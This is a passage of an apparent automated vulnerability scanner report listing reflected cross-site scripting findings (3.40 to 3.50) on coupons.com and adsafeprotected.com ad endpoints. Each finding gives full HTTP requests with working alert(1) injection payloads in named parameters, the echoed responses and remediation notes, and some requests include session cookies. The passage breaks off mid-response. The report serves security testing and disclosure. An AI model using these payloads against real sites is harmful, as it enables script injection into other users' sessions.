Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:05:08 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:04:08 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:15:08 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1783ab';alert(1)//16595f62d8f&spage=.com/&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1205D705547512&c84521=xXVKRv2iYdqnFzPWHmOrzbUxXiv1
...[SNIP]...

3.40. http://couponbar.coupons.com/adblob.asp [pzn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the pzn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e09b'%3balert(1)//407021f8be4 was submitted in the pzn parameter. This input was echoed as 4e09b';alert(1)//407021f8be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq37104e09b'%3balert(1)//407021f8be4&req=1320087850320&zip=&did=&spage=.com/&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:26 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:03:26 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:14:26 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/&btcat=100&entity=29890&site_code=13306iq37104e09b';alert(1)//407021f8be4&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1204D705547512&c84521=xXVKRv2iYdqnFMicjKyRMeEnrVUqG&p84965=E10312011D1204D533424020&c84965=qY6fvauqC5k41BjR
...[SNIP]...

3.41. http://couponbar.coupons.com/adblob.asp [spage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://couponbar.coupons.com
Path:   /adblob.asp

Issue detail

The value of the spage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4adc'%3balert(1)//eaf4aa2dc00 was submitted in the spage parameter. This input was echoed as e4adc';alert(1)//eaf4aa2dc00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/e4adc'%3balert(1)//eaf4aa2dc00&npage=1 HTTP/1.1
Host: couponbar.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:05:00 GMT
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 867
Content-Type: text/html
Expires: Mon, 31 Oct 2011 19:04:00 GMT
Cache-control: no-cache
CI_SVR_ID: 11/69
Set-Cookie: NSC_DpvqpoCbs-IUUQ=ffffffff0916155445525d5f4f58455e445a4a423660;expires=Mon, 31-Oct-2011 19:15:00 GMT;path=/;httponly

<html><head>
<title>Coupons.com</title>
</head>
<body topmargin='0' leftmargin='0' marginheight='0' marginwidth='0'>
<SCRIPT TYPE='text/javascript'>document.write('<!-- BEGIN STANDARD TAG - 160 x
...[SNIP]...
<SCRIPT TYPE="text/javascript" SRC="http://ad.coupons.com/st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/e4adc';alert(1)//eaf4aa2dc00&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1205D705547512&c84521=xXVKRv2iYdqnFzPWHmOrzbUxXiv1d&p84965=E10
...[SNIP]...

3.42. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2d3"-alert(1)-"15561a177f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.comce2d3"-alert(1)-"15561a177f2/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=605B87974EE3B7D84553DEC5CCF31F92; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.comce2d3"-alert(1)-"15561a177f2/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8
...[SNIP]...

3.43. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 598d5"-alert(1)-"286b77b0405 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794598d5"-alert(1)-"286b77b0405/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB4A1D48099BCAE3AB902FC6F3BC78C9; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794598d5"-alert(1)-"286b77b0405/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303
...[SNIP]...

3.44. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42202"-alert(1)-"315bbf99bf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/18497942202"-alert(1)-"315bbf99bf2/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=863AA0BD61A78A7BB73DA7B19CB5C588; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:01 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/18497942202"-alert(1)-"315bbf99bf2/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.84183034786376
...[SNIP]...

3.45. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3723"-alert(1)-"86da9ead8b1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServeb3723"-alert(1)-"86da9ead8b1/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5279BF91DE610D58DA9B8A67BF08C219; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServeb3723"-alert(1)-"86da9ead8b1/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafe
...[SNIP]...

3.46. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f12a5"-alert(1)-"4cae985354f was submitted in the flash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10f12a5"-alert(1)-"4cae985354f&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=89D1E63635A9A549E99B2C87A565B70C; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:58 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10f12a5"-alert(1)-"4cae985354f&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "f
...[SNIP]...

3.47. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbce9"-alert(1)-"c20e75cf945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639&fbce9"-alert(1)-"c20e75cf945=1 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3CE2B0610A4BA16DB8EDA52217788F23; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639&fbce9"-alert(1)-"c20e75cf945=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4b477594-0429-11e1-954b-003048cc6f90"
};


(functi
...[SNIP]...

3.48. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d2da"-alert(1)-"963b56b754 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P115201109261748194d2da"-alert(1)-"963b56b754&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7A71FF0BF0D0B647E91AD84AEA59DEF; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:57 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P115201109261748194d2da"-alert(1)-"963b56b754&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqqu
...[SNIP]...

3.49. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e89b"-alert(1)-"8fb850ab93d was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC520905e89b"-alert(1)-"8fb850ab93d&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97A7E8CF12C148F43D7B5BB33AF435AE; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:57 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC520905e89b"-alert(1)-"8fb850ab93d&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   d
...[SNIP]...

3.50. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 306ae"-alert(1)-"7022657cf22 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639306ae"-alert(1)-"7022657cf22 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
